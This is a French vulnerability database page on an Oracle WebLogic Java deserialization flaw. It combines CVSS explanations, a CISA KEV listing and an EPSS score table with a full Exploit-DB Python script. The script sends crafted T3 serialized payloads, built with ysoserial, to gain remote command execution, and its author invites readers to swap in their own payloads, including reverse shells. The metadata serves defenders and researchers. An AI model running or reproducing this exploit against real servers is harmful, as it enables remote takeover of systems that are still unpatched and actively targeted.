CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
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The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.
Deserialization of Untrusted Data The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V3.1
9.8
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
More informations
Base: Exploitabilty Metrics
The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.
Attack Vector
This metric reflects the context by which vulnerability exploitation is possible.
Network
The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
Attack Complexity
This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.
Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
Privileges Required
This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.
None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.
None
The vulnerable system can be exploited without interaction from any user.
Base: Scope Metrics
The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.
Scope
Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.
Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.
Base: Impact Metrics
The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.
Confidentiality Impact
This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.
High
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.
Integrity Impact
This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.
High
There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.
Availability Impact
This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.
High
There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).
Temporal Metrics
The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.
Environmental Metrics
These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
nvd@nist.gov
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
CISA KEV (Vulnérabilités Exploitées Connues)
Nom de la vulnérabilité : Oracle WebLogic Server Deserialization of Untrusted Data Vulnerability
Action requise : Apply updates per vendor instructions.
Connu pour être utilisé dans des campagnes de ransomware : Unknown
Ajouter le : 2021-11-02 23h00 +00:00
Action attendue : 2022-05-02 22h00 +00:00
Informations importantes
Ce CVE est identifié comme vulnérable et constitue une menace active, selon le Catalogue des Vulnérabilités Exploitées Connues (CISA KEV). La CISA a répertorié cette vulnérabilité comme étant activement exploitée par des cybercriminels, soulignant ainsi l'importance de prendre des mesures immédiates pour remédier à cette faille. Il est impératif de prioriser la mise à jour et la correction de ce CVE afin de protéger les systèmes contre les potentielles cyberattaques.
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
92.71%
–
–
2023-03-12
–
–
–
96.31%
–
2023-06-04
–
–
–
96.15%
–
2023-07-09
–
–
–
96.52%
–
2023-09-10
–
–
–
96.47%
–
2023-10-15
–
–
–
96.64%
–
2023-10-29
–
–
–
96.64%
–
2023-11-19
–
–
–
96.69%
–
2023-12-24
–
–
–
96.88%
–
2024-06-02
–
–
–
96.88%
–
2024-06-02
–
–
–
96.88%
–
2024-06-16
–
–
–
96.73%
–
2024-12-22
–
–
–
96.78%
–
2025-01-19
–
–
–
96.78%
–
2025-03-18
–
–
–
–
92.26%
2025-03-18
–
–
–
–
92.26,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2017-09-26 22h00 +00:00 Auteur : SlidingWindow EDB Vérifié : No
# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]
# Date: [27/09/2017]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vulnerability Author: FoxGloveSecurity
# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]
# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]
# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]
# CVE : [CVE-2015-4852]
'''
This exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send
Ping requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.
Feel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as
this script will do it for you on the fly.
Note: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)
'''
#!/usr/bin/env python
import socket
import sys
import struct
from binascii import unhexlify
print "\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit..."
print "[+]Here is the command:\n\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\n"
if len(sys.argv) < 2:
print "\n[+]Please provide target IP and Port..."
print "[+]Usage:\n\t ./weblogic_linuxPing.py <target_ip> <target_port>"
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+]Connecting to %s port %s' % server_address
sock.connect(server_address)
#Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print '[+]Sending\n"%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, '\n[+]Received "%s"' % data
#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.
#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length
chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out
#len(payload) is xxxx bytes
#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target.
#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload.
#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)
chunk2 = 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chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
totallength = len(chunk1) + len(chunk2) + len(chunk3)
print "[+]TOTAL payload length: ", totallength
#Update the TOTAL payload length in Chunk1
len_hex = hex(totallength)
print "[+]Payload length in HEX: ", len_hex
len_hex = len_hex.replace('0x', '0')
print "[+]Payload length in HEX: " , len_hex
s1 = len_hex[:2]
s2 = len_hex[2:4]
len_hex = unhexlify(s1 + s2)
print "[+]Payload length in HEX now: ", len_hex
#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)
print "[+]Updating Chunk1 according to the TOTAL payload length..."
chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
#print "[+]Updated 'chunk1' : \n", chunk1
#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1'
payload = chunk1 + chunk2 + chunk3
#Adjust header for appropriate message length
payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
print '[+]Sending payload...'
sock.send(payload)
print "[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!"
print("\n[+]Response to Request#: \n")
response = sock.recv(15000)
print(response)